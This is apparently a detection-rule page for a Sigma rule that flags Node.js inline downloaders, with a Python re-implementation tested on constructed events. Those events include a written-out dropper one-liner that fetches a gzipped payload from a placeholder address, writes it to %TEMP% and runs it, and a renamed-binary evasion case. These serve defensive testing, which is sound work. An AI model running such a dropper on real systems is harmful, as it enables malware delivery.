LoFP / legitimate scripts using node.js with these modules

Techniques

Sample rules

Potentially Suspicious Inline JavaScript Execution via NodeJS Binary

Description

Detects potentially suspicious inline JavaScript execution by Node.js (code typically passed on the command line with node -e / --eval) where the command line contains, all at once, the names a one-line downloader relies on: the http, fs, path and zlib modules together with execSync and spawn from child_process. Note that the rule does not check for the -e flag itself; any node.exe command line that contains all six strings matches, which is why legitimate build or install helpers written with the same modules show up as false positives.

Detection logic

condition: all of selection_*
selection_cmd:
  CommandLine|contains|all:
  - http
  - execSync
  - spawn
  - fs
  - path
  - zlib
selection_img:
- Image|endswith: \node.exe
- OriginalFileName: node.exe
- Product: Node.js
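To show what this rule does and does not distinguish, here is an added example (not the Sigma project's code, and not pysigma) that re-implements the two selections in Python with the Sigma semantics they rely on, then runs them over constructed process-creation events: a one-line downloader, a legitimate inline install helper that uses the same six modules (the false positive this page records), a plain script invocation, and a renamed node binary. Every path, hostname and command line below is made up for the example.

```python
"""Evaluate the rule's selections against constructed process-creation events.

Added example: a minimal re-implementation of the Sigma semantics this rule
uses (case-insensitive contains/endswith, OR across the alternatives of a
list-form selection, AND across contains|all), not the Sigma project's code.
The events are constructed, not real telemetry.
"""

# Transcribed from the detection logic above.
IMAGE_ALTERNATIVES = [  # selection_img is a list, so any one alternative suffices
    ("Image", "endswith", r"\node.exe"),
    ("OriginalFileName", "equals", "node.exe"),
    ("Product", "equals", "Node.js"),
]
CMD_KEYWORDS = ["http", "execSync", "spawn", "fs", "path", "zlib"]  # contains|all


def _lower(event, field):
    """Sigma string matching is case-insensitive unless |cased is given."""
    return str(event.get(field, "")).lower()


def selection_img(event):
    for field, op, wanted in IMAGE_ALTERNATIVES:
        have, wanted = _lower(event, field), wanted.lower()
        if op == "endswith" and have.endswith(wanted):
            return True
        if op == "equals" and have == wanted:
            return True
    return False


def selection_cmd(event):
    """contains|all: every keyword must occur somewhere in CommandLine."""
    cmd = _lower(event, "CommandLine")
    return all(k.lower() in cmd for k in CMD_KEYWORDS)


def missing_keywords(event):
    """Which contains|all tokens kept selection_cmd from firing (for triage)."""
    cmd = _lower(event, "CommandLine")
    return [k for k in CMD_KEYWORDS if k.lower() not in cmd]


def rule_matches(event):
    """condition: all of selection_*"""
    return selection_img(event) and selection_cmd(event)


# Constructed: one-liner that fetches a gzipped payload over HTTP, writes it
# to %TEMP% and launches it (TEST-NET address, not a real host).
DROPPER = {
    "Image": r"C:\Program Files\nodejs\node.exe",
    "OriginalFileName": "node.exe",
    "Product": "Node.js",
    "CommandLine": (
        "node.exe -e \"const http=require('http'),fs=require('fs'),path=require('path'),"
        "zlib=require('zlib'),{execSync,spawn}=require('child_process');"
        "http.get('http://192.0.2.10/p.gz',r=>r.pipe(zlib.createGunzip())"
        ".pipe(fs.createWriteStream(path.join(process.env.TEMP,'p.exe')))"
        ".on('finish',()=>spawn(path.join(process.env.TEMP,'p.exe'))))\""
    ),
}

# Constructed: the false positive this page records. A postinstall helper that
# pulls a prebuilt tool from an internal mirror uses the same six modules, so
# the rule cannot tell it from the dropper on command line alone.
LEGIT_HELPER = {
    "Image": r"C:\Program Files\nodejs\node.exe",
    "OriginalFileName": "node.exe",
    "Product": "Node.js",
    "CommandLine": (
        "node.exe -e \"const fs=require('fs'),path=require('path'),zlib=require('zlib'),"
        "http=require('http'),{execSync,spawn}=require('child_process');"
        "const dest=path.join(__dirname,'bin','tool.exe');"
        "http.get('http://mirror.internal.example/tool.gz',r=>r.pipe(zlib.createGunzip())"
        ".pipe(fs.createWriteStream(dest)).on('finish',()=>{execSync(dest+' --version');"
        "spawn(dest,['init'])}))\""
    ),
}

# Constructed: ordinary script invocation, none of the six strings present.
PLAIN_SCRIPT = {
    "Image": r"C:\Program Files\nodejs\node.exe",
    "OriginalFileName": "node.exe",
    "Product": "Node.js",
    "CommandLine": r'node.exe "C:\dev\app\server.js" --port 8080',
}

# Constructed: node.exe copied under another name. Image no longer ends with
# \node.exe, but the PE version info (OriginalFileName, Product) survives the
# rename, and selection_img accepts either alternative.
RENAMED_NODE = dict(DROPPER, Image=r"C:\Users\Public\update.exe",
                    CommandLine=DROPPER["CommandLine"].replace("node.exe", "update.exe", 1))


if __name__ == "__main__":
    for name, ev in [("dropper", DROPPER), ("legit helper", LEGIT_HELPER),
                     ("plain script", PLAIN_SCRIPT), ("renamed node", RENAMED_NODE)]:
        print(f"{name:13} match={rule_matches(ev)!s:5} missing={missing_keywords(ev)}")
```

The dropper and the helper both fire, which is the false positive this page documents; the plain script invocation stays quiet because none of the six tokens appear. Since contains|all matches substrings case-insensitively, the short tokens fs and path contribute little on their own, and the rule relies on the combination with execSync, spawn and zlib for precision. Narrowing a known-good helper is better done with a filter on its parent process or exact command line than by dropping a keyword, which would widen the rule for everyone.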